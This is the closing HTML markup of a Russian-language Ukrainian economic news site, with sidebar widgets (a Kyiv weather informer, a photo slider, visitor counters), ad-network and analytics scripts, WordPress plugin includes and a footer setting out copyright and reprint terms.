head.appendChild(script);</script></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div><a href="https://enovosty.com/ekonomika/full/2811-motor-sich-brilliant-otechestvennogo-mashinostroeniya-prakticheski-utrachen-dlya-ukrainy" target="_blank" rel="noreferrer noopener"><img alt="Мотор Сич" src="/wp-content/uploads/2020/11/Motor.jpg"></a></div></br><div id="help" style="margin-bottom: 15px;"><a href="https://dobro.ua/" target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><br><br><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><script>jQuery(document).ready(function($){$('#slider_gallery').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery div.anythingSlider-minimalist-round span.arrow{height:170px}</style><div class="topnews_single slide gallery" style="width: 258px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery"><li><ul class="tact"><li id="li0" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=622&pid=13302" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/kosh1/thumbs/thumbs_11.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Красота крупных кошек"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=622&pid=13302" title="Красота крупных кошек" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Красота крупных кошек</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=621&pid=13272" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/sneg2/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Завораживающие снежные пейзажи"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=621&pid=13272" title="Завораживающие снежные пейзажи" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Завораживающие снежные пейзажи</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=620&pid=13252" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/ryzh1/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Рыжеволосые красотки со всего мира"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=620&pid=13252" title="Рыжеволосые красотки со всего мира" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Рыжеволосые красотки со всего мира</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=619&pid=13236" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/vod1/thumbs/thumbs_05.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Полуподводные фото: между двух миров"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=619&pid=13236" title="Полуподводные фото: между двух миров" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Полуподводные фото: между двух миров</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4832047"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4832047","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "131b2ab274";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961600637-0"><script>catfish('div-gpt-ad-1595961600637-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.hbrd.io/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>